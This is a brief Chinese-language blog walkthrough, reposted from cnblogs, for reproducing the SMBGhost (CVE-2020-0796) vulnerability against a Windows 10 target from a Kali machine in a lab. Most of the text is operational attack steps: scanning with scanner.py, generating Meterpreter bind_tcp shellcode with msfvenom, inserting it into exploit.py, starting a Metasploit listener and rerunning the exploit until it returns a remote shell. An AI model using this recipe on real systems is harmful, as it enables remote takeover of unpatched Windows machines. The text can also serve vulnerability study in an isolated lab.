永恒之黑CVE-2020-0796
作者:互联网
1.永恒之黑漏洞复现需要准备三个东西,1个为kali攻击机,一个为win10靶机(关闭防火墙)
kali:192.168.15.128
win10:192.168.15.133
1.以下下是准备好的poc工具
2.首先第一步我们对靶机进行漏洞检测,使用到的是SMBGhost这个工具进行漏洞检测,python3 scanner.py 192.168.15.133
cd进入目录后查看
检测出来存在该漏洞
3.下一步我们用msf生成一个编码为X00的shellcode,反向连接木马 msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
4.打开POC文件将里面的exploit.py buf后面的代码进行修改
5.将exploit里面的内容进行替换,然后保存文件,在kali里面运行
5.下一步我们进入msf,然后设置好ip和反弹连接端口,然后开启端口监听
6.下一步我们用刚才的脚本进行攻击等待shell连接,python3 exploit -ip 192.168.15.133
7.如果拿不到shell就多点几次,成功拿到shell!
标签:15.133,shell,kali,192.168,漏洞,exploit,2020,0796,CVE 来源: https://www.cnblogs.com/drdsct/p/15793707.html